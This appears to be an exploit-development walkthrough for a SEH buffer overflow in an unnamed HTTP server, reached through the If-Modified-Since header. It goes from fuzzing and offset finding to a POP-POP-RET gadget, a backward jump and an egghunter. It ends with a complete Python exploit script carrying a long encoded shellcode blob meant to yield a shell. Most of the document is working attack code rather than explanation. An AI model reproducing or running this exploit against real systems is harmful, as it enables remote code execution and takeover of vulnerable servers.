Fuzzing
get HTTP request
| GET / HTTP/1.1Host: 192.168.1.9User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0 |
Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txt
Vulnerable:If-Modified-Since: Wed, <fuzzing-payload>
| s_string(“If-Modified-Since: Sat,”, name=”If-Modified-Since”, fuzzable = False)s_delim(” “, name=”space-10”, fuzzable = False)s_string(“15 Jun 2019 01:36:09 GMT”, name=”If-Modified-Since-Value”) |
Offset
| #!/usr/bin/python import socket, sys, os ip = “192.168.1.9”port = 80 offset = “A”*350 buffer = offset + nseh + seh request = “”request += “GET / HTTP/1.1\r\n”request += “Host: 192.168.1.9\r\n”request += “User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n”request += “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”request += “Accept-Language: en-US,en;q=0.5\r\n”request += “Accept-Encoding: gzip, deflate\r\n”request += “Connection: close\r\n”request += “Upgrade-Insecure-Requests: 1\r\n”request += “If-Modified-Since: Thu, ” + buffer + “\r\n\r\n” s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close() |
SEH overwrite
POP-POP-RET
!mona seh
Address starts with null characterIf we only take 44F584 part of 0044F584, D characters we add after seh will make it 4444F584
If we remove D characters, the correct address will be found
Remember normal SEH structure for the exploit
| [Junk][nSEH][SEH][Nop-Shellcode] nSEH = the jump to the shellcodeSEH = a reference to a pop pop ret find offsetfind pop-pop-retshort jump with nsehcreate shellcode offset = “A”*304nseh = “\xcc\xcc\xcc\xcc”seh = “\x57\xf8\x44” # pop-pop-ret 0x0044f857nops = “\x90” *24shellcode = “” |
But we don’t have many place so we’ll go backwards
50 jmp back = \xeb\xcc
Calculations:
JMP 50 bytes back
We need meaningful calculations. There are some corruptions in A buffer.
Start of A buffer = 6FE80″A” buffer start after the corruptions = 6FEE0eip (at the end of As) = 6FF7E
So there is enough space more than 50 bytes.
Let’s JMP 50 back and the new address right after \xeb\xcc is 0x6FF7E
The calculation for space before egghunterStart of A buffer = 6fe80new address after JMP 50 back = 6ff7e
So the offset will be like following:
offset = “A”*254 + egghunter + “A”*(304-254-32)
Before we do JMP 50 backwards with our calculations:
After JMP 50 backwards, the address becomes 6ff7e which is the start address of egghunter as can be seen in memory dump
We’re all set. Let’s create the shellcode and get a shell
Final Exploit and Shell
| #!/usr/bin/python import socket, sys, os ip = “192.168.1.9”port = 80 egghunter = “\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7” #offset = “A”* 254 + egghunter + “A”*(304-254-32)offset = “A”*254 + egghunter + “A”*(304-254-32)nseh = “\xeb\xcc\x90\x90″seh = “\x57\xf8\x44” # pop-pop-ret 0x0044f857 egg = “kalikali”shellcode = “”shellcode += “\x89\xe3\xdb\xc9\xd9\x73\xf4\x58\x50\x59\x49\x49″shellcode += “\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43″shellcode += “\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30″shellcode += “\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30″shellcode += “\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49″shellcode += “\x39\x6c\x79\x78\x6d\x52\x45\x50\x73\x30\x77\x70″shellcode += “\x43\x50\x6d\x59\x6d\x35\x30\x31\x6b\x70\x31\x74″shellcode += “\x6e\x6b\x62\x70\x36\x50\x6c\x4b\x76\x32\x54\x4c”shellcode += “\x6c\x4b\x73\x62\x46\x74\x6c\x4b\x70\x72\x74\x68″shellcode += “\x56\x6f\x38\x37\x61\x5a\x67\x56\x35\x61\x59\x6f”shellcode += “\x4c\x6c\x37\x4c\x75\x31\x61\x6c\x36\x62\x44\x6c”shellcode += “\x65\x70\x6b\x71\x4a\x6f\x54\x4d\x36\x61\x5a\x67″shellcode += “\x39\x72\x6a\x52\x33\x62\x70\x57\x6e\x6b\x62\x72″shellcode += “\x52\x30\x6e\x6b\x73\x7a\x35\x6c\x6c\x4b\x32\x6c”shellcode += “\x47\x61\x34\x38\x5a\x43\x52\x68\x55\x51\x48\x51″shellcode += “\x66\x31\x4c\x4b\x50\x59\x77\x50\x37\x71\x68\x53″shellcode += “\x4e\x6b\x70\x49\x52\x38\x39\x73\x36\x5a\x63\x79″shellcode += “\x4c\x4b\x45\x64\x6e\x6b\x57\x71\x4a\x76\x74\x71″shellcode += “\x79\x6f\x6e\x4c\x59\x51\x7a\x6f\x76\x6d\x56\x61″shellcode += “\x4a\x67\x57\x48\x4b\x50\x34\x35\x7a\x56\x44\x43″shellcode += “\x31\x6d\x6a\x58\x45\x6b\x71\x6d\x67\x54\x43\x45″shellcode += “\x48\x64\x71\x48\x4e\x6b\x52\x78\x67\x54\x43\x31″shellcode += “\x58\x53\x33\x56\x6c\x4b\x44\x4c\x32\x6b\x4c\x4b”shellcode += “\x36\x38\x35\x4c\x73\x31\x58\x53\x4e\x6b\x55\x54″shellcode += “\x6c\x4b\x45\x51\x7a\x70\x4e\x69\x62\x64\x54\x64″shellcode += “\x64\x64\x63\x6b\x53\x6b\x75\x31\x33\x69\x73\x6a”shellcode += “\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x72\x7a”shellcode += “\x6c\x4b\x54\x52\x48\x6b\x4c\x4d\x53\x6d\x52\x48″shellcode += “\x45\x63\x37\x42\x65\x50\x35\x50\x65\x38\x50\x77″shellcode += “\x44\x33\x50\x32\x31\x4f\x46\x34\x43\x58\x30\x4c”shellcode += “\x31\x67\x61\x36\x36\x67\x6b\x4f\x4e\x35\x4e\x58″shellcode += “\x6c\x50\x67\x71\x55\x50\x65\x50\x36\x49\x49\x54″shellcode += “\x62\x74\x36\x30\x35\x38\x67\x59\x6b\x30\x52\x4b”shellcode += “\x73\x30\x79\x6f\x6a\x75\x66\x30\x36\x30\x36\x30″shellcode += “\x76\x30\x63\x70\x66\x30\x37\x30\x52\x70\x55\x38″shellcode += “\x49\x7a\x36\x6f\x39\x4f\x69\x70\x69\x6f\x4e\x35″shellcode += “\x4c\x57\x32\x4a\x66\x65\x50\x68\x59\x50\x4f\x58″shellcode += “\x65\x51\x57\x78\x63\x58\x47\x72\x77\x70\x71\x32″shellcode += “\x6c\x78\x6c\x49\x4d\x36\x51\x7a\x76\x70\x62\x76″shellcode += “\x70\x57\x70\x68\x6d\x49\x79\x35\x72\x54\x50\x61″shellcode += “\x39\x6f\x58\x55\x6c\x45\x59\x50\x42\x54\x64\x4c”shellcode += “\x79\x6f\x42\x6e\x44\x48\x72\x55\x78\x6c\x70\x68″shellcode += “\x6c\x30\x6e\x55\x4e\x42\x76\x36\x69\x6f\x78\x55″shellcode += “\x62\x48\x63\x53\x32\x4d\x45\x34\x47\x70\x4d\x59″shellcode += “\x38\x63\x73\x67\x42\x77\x72\x77\x64\x71\x6b\x46″shellcode += “\x30\x6a\x37\x62\x36\x39\x50\x56\x6a\x42\x39\x6d”shellcode += “\x71\x76\x5a\x67\x53\x74\x37\x54\x67\x4c\x77\x71″shellcode += “\x73\x31\x6c\x4d\x62\x64\x54\x64\x76\x70\x6b\x76″shellcode += “\x63\x30\x61\x54\x36\x34\x52\x70\x31\x46\x70\x56″shellcode += “\x63\x66\x72\x66\x43\x66\x50\x4e\x32\x76\x66\x36″shellcode += “\x66\x33\x36\x36\x65\x38\x34\x39\x48\x4c\x35\x6f”shellcode += “\x6e\x66\x4b\x4f\x7a\x75\x6d\x59\x6d\x30\x62\x6e”shellcode += “\x61\x46\x42\x66\x69\x6f\x76\x50\x63\x58\x56\x68″shellcode += “\x4f\x77\x37\x6d\x75\x30\x49\x6f\x4b\x65\x6f\x4b”shellcode += “\x58\x70\x6c\x75\x4d\x72\x76\x36\x72\x48\x39\x36″shellcode += “\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x4b\x65\x37\x4c”shellcode += “\x44\x46\x61\x6c\x34\x4a\x6d\x50\x4b\x4b\x49\x70″shellcode += “\x64\x35\x34\x45\x6f\x4b\x31\x57\x46\x73\x51\x62″shellcode += “\x72\x4f\x52\x4a\x57\x70\x71\x43\x59\x6f\x4b\x65″shellcode += “\x41\x41” stage1 = offset + nseh + sehstage2 = egg + shellcode request = “”request += “GET / HTTP/1.1\r\n”request += “Host: 192.168.1.9” + stage2 + “\r\n”request += “User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n”request += “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”request += “Accept-Language: en-US,en;q=0.5\r\n”request += “Accept-Encoding: gzip, deflate\r\n”request += “Connection: close\r\n”request += “Upgrade-Insecure-Requests: 1\r\n”request += “If-Modified-Since: Thu, ” + stage1 + “\r\n\r\n” s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close() |
